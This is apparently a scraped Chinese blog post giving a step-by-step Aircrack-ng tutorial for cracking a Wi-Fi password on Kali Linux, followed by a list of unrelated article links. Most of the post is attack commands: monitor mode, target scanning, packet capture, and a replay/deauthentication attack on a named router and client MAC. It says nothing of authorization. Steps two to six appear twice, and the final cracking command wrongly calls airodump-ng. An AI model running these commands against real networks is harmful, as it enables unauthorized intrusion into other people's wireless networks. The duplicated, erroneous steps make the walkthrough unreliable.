kalilinux下使用Aircrack-ng破解过程
2016-05-27 16:18
344 查看
第一步所谓的开启网卡:airmon-ng wlan0 up,我测试半天,不管用,反正我的网卡已经启用了,无所谓了。
第二步:开启监听模式airmon-ng start wlan0,结果如下
如果你要是看不到monitor mode enabled这些字眼,就再启动一次,不要启动多次,启动多次会出现wlan0mon、 wlan0monmon、 wlan0monmonmon不知为啥那么多,为防止瞎了,所以干脆就出现一个wlan0mon
第三步:airodump-ng wlan0mon 探测我们要攻击的目标主机
主要我们要查看目标的通道ch多少,和前两个BSSID和STATION两个值到底多少。
第四步:airodump-ng --ivs -w longas -c 1 wlan0mon 开始抓包! 转包文件为当前文件夹下longas-01.ivs
#--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。
第五步:然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0
aireplay-ng -3 -b D8:24:BD:79:2A:9B -h 00:26:C7:79:9C:32 wlan0mon
第六步:破解密码
airodump-ng longas-01.ivs -w dic.txt
第二步:开启监听模式airmon-ng start wlan0,结果如下
如果你要是看不到monitor mode enabled这些字眼,就再启动一次,不要启动多次,启动多次会出现wlan0mon、 wlan0monmon、 wlan0monmonmon不知为啥那么多,为防止瞎了,所以干脆就出现一个wlan0mon
第三步:airodump-ng wlan0mon 探测我们要攻击的目标主机
主要我们要查看目标的通道ch多少,和前两个BSSID和STATION两个值到底多少。
第四步:airodump-ng --ivs -w longas -c 1 wlan0mon 开始抓包! 转包文件为当前文件夹下longas-01.ivs
#--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。
第五步:然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0
aireplay-ng -3 -b D8:24:BD:79:2A:9B -h 00:26:C7:79:9C:32 wlan0mon
第六步:破解密码
airodump-ng longas-01.ivs -w dic.txt
相关文章推荐
- AngularJS使用ngOption实现下拉列表的实例代码
- Flask, Angularjs共存之道
- flume NG 中文 Welcome to Apache Flume 第一页 醉了
- NG比较实用的几个知识点
- 构建基于Nginx的文件服务器思路与实现
- ng-repeat指令实现循环输出 ng-click 动态触发
- Stanford机器学习(Andrew Ng)Lecture2(一)
- Stanford机器学习(Andrew Ng)Lecture1
- aircrack-ng 添加Mac OS X 支持 airodump-ng和aireplay-ng都可以用了
- Flume-ng的原理和使用
- 解决运行CI框架的地址在NG服务器报404错误的原因
- Cordova各个插件使用介绍系列(三)—$cordovaImagePicker从手机图库选择多张图片
- Cordova各个插件使用介绍系列(四)—canvas2ImagePlugin保存二维码到手机本地
- Ubuntu12环境下Thin+rails(4)+ruby(2)+nginx+mysql 配置
- 在LNMP下用nginx 1.4.7配置nagios监控
- 【无线攻防实战】小试无线安全 推荐
- crack will password
- 2.EVE-NG安装过程介绍
- Ionic 的 ng-class 在聊天功能上面的巧妙运用